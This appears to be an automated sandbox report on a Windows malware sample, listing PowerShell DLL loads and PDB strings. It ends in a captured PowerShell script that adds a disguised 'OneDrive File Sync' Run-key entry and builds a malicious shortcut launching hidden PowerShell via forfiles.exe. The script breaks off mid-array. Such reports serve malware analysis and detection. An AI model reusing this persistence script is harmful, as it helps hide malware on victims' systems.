Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll | |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbHF source: powershell.exe, 00000006.00000002.3080286160.00000276F9F8A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: 364e35\System.Management.Automation.pdbT source: powershell.exe, 0000000D.00000002.2517245546.00000278B4515000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb4Gm source: powershell.exe, 00000006.00000002.3080286160.00000276F9F8A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbh source: powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: 31bf3856ad364e35corlib.pdb source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000007.00000002.3038134380.000002271A470000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3056953361.00000242CC694000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb6 source: powershell.exe, 00000006.00000002.2996314232.00000276F7C08000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\mscorlib.pdbpdblib.pdbR source: powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb^ source: powershell.exe, 00000007.00000002.3027895006.000002271A196000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: CallSite.Target.pdbz* source: powershell.exe, 00000008.00000002.3043110915.00000242CC60D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ws\System.Management.Automation.pdbpdb source: powershell.exe, 00000018.00000002.3196743622.00000223CF913000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdb# source: powershell.exe, 00000018.00000002.3188775271.00000223CF58E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000006.00000002.3069004081.00000276F9F1A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2517245546.00000278B4515000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000006.00000002.3052251366.00000276F9CE1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2516637962.00000278B42A2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbX source: powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automationib.pdb source: powershell.exe, 00000008.00000002.2572094402.00000242B23BB000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdbs source: powershell.exe, 00000008.00000002.2572094402.00000242B2414000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000006.00000002.3039134768.00000276F9C85000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000006.00000002.3069004081.00000276F9F1A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3196743622.00000223CF87E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32x source: powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000006.00000002.3069004081.00000276F9F1A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ib.pdb source: powershell.exe, 00000007.00000002.3011907494.000002271A12A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb91? source: powershell.exe, 00000008.00000002.3009488482.00000242CC320000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ws\dll\mscorlib.pdbe source: powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb89 source: powershell.exe, 0000000D.00000002.2516637962.00000278B42A2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Users\Bill Hillman\source\repos\prohashingDLL\x64\Release\prohashingDLL.pdb source: HQsitBLlOv.dll |
Source: | Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: n.pdbI3 source: powershell.exe, 0000000D.00000002.2518172369.00000278B45AC000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb_` source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdb source: powershell.exe, 00000007.00000002.3011907494.000002271A12A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbC:\W source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdb^ source: powershell.exe, 0000001C.00000002.3251820933.0000025E7D948000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: n.pdb source: powershell.exe, 00000006.00000002.3081283774.00000276F9F9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000006.00000002.3052251366.00000276F9CE1000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbata\ source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000001C.00000002.3251820933.0000025E7D948000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: b.pdb source: powershell.exe, 00000008.00000002.3043110915.00000242CC60D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\Servererver32 source: powershell.exe, 0000001C.00000002.3250944670.0000025E7D907000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ement.Automation.pdbt source: powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: -C:\Users\Bill Hillman\source\repos\prohashingDLL\x64\Release\prohashingDLL.pdb source: HQsitBLlOv.dll |
Source: | Binary string: rlib.pdb source: powershell.exe, 00000008.00000002.3043110915.00000242CC666000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb9$M source: powershell.exe, 00000007.00000002.3038134380.000002271A470000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000007.00000002.3038134380.000002271A4B5000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: scorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.3069004081.00000276F9F75000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdbe089Z source: powershell.exe, 00000018.00000002.3192927958.00000223CF610000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3039134768.00000276F9C35000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2516094783.00000278B4203000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3196743622.00000223CF86D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DAEF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: n.pdb!3 source: powershell.exe, 0000000D.00000002.2518172369.00000278B45AC000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.3039134768.00000276F9C35000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3038134380.000002271A470000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DAEF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.3039134768.00000276F9C85000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbH$- source: powershell.exe, 00000006.00000002.3052251366.00000276F9CE1000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\mscorlib.pdbpdblib.pdbrS source: powershell.exe, 00000018.00000002.3196743622.00000223CF8EC000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: n.pdbjk source: powershell.exe, 00000006.00000002.3081283774.00000276F9F9D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdb9dll source: powershell.exe, 0000000D.00000002.2516637962.00000278B42A2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3052251366.00000276F9CE1000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb` source: powershell.exe, 00000006.00000002.3081283774.00000276F9F9D000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdbB source: powershell.exe, 00000008.00000002.3009488482.00000242CC320000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50
,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115, |